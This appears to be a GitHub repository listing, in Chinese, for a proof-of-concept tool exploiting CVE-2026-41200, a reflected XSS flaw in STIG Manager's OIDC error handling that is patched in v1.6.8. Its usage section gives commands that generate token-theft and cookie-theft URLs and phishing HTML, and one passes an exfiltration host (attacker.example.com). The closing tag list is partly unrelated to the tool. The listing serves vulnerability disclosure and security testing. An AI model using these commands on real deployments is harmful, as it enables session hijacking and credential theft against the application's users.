Hunt-Benito/cve-2026-41200-stig-manager-oidc-reflected-xss

GitHub: Hunt-Benito/cve-2026-41200-stig-manager-oidc-reflected-xss

针对 STIG Manager OIDC 认证错误处理中反射型 XSS 漏洞的概念验证工具,可生成恶意 URL 实现 token 窃取与会话劫持。

Stars: 0 | Forks: 0

# CVE-2026-41200 — STIG Manager OIDC 反射型 XSS PoC STIG Manager 1.5.10 至 1.6.7 版本中反射型跨站脚本攻击 (XSS) 漏洞的概念验证。 ## 漏洞概述 STIG Manager Web App 的 OIDC 身份验证错误处理代码中存在反射型 XSS 漏洞。由 OIDC 提供者返回的 `error` 和 `error_description` 查询参数在未经 HTML 转义的情况下,通过 `innerHTML` 被直接写入 DOM。能够构造恶意 URL 并诱骗用户点击的攻击者,可以在应用程序上下文中执行任意 JavaScript。 当目标用户在另一个浏览器标签页中拥有活跃的 STIG Manager 会话时,该漏洞的危害最为严重 —— 注入的代码可以与管理 access token 的 SharedWorker 进行通信,从而代表受害者发起已认证的 API 请求。 - **CVE**: CVE-2026-41200 - **CVSS 4.0**: 8.5 (高危) - **受影响版本**: NUWCDIVNPT/stig-manager >= 1.5.10, < 1.6.8 - **已修补版本**: v1.6.8 - **安全通报**: [GHSA-wg33-j3rv-jq72](https://github.com/NUWCDIVNPT/stig-manager/security/advisories/GHSA-wg33-j3rv-jq72) - **文章**: [hunt-benito.com](https://www.hunt-benito.com/stig-manager-reflected-xss-cve-2026-41200-critical-oidc-error-handling-flaw-enables-session-theft/) ## 用法 ``` # 生成恶意回调 URL (SharedWorker token theft 模式) python3 cve-2026-41200-poc.py -c http://localhost:54000/auth/callback -m sharedworker # 生成简单 cookie 窃取 payload python3 cve-2026-41200-poc.py -c http://localhost:54000/auth/callback -m simple # 输出为钓鱼 HTML python3 cve-2026-41200-poc.py --format html # 自定义 API 和 exfil 主机 python3 cve-2026-41200-poc.py \ -c https://stig-manager.example.com/auth/callback \ -a https://stig-manager.example.com \ -e https://attacker.example.com ``` ## 免责声明 本工具仅供**教育目的和经授权的安全研究使用**。 - 仅针对您拥有或获得明确授权进行测试的安装环境使用。 - 未经授权访问计算机系统在大多数司法管辖区均属违法行为。 - 作者对因滥用本工具造成的任何后果不承担任何责任。
标签:CISA项目, Cookie窃取, CVE-2026-41200, CVSS 8.5, DOM型XSS, HTML注入, Object Callbacks, OIDC, PoC, SharedWorker, STIG Manager, Token窃取, Web安全, 会话劫持, 反射型XSS, 多模态安全, 安全测试, 攻击性安全, 暴力破解, 概念验证, 漏洞分析, 网络安全, 网络钓鱼, 蓝队分析, 跨站脚本攻击, 路径探测, 身份验证绕过, 逆向工具, 隐私保护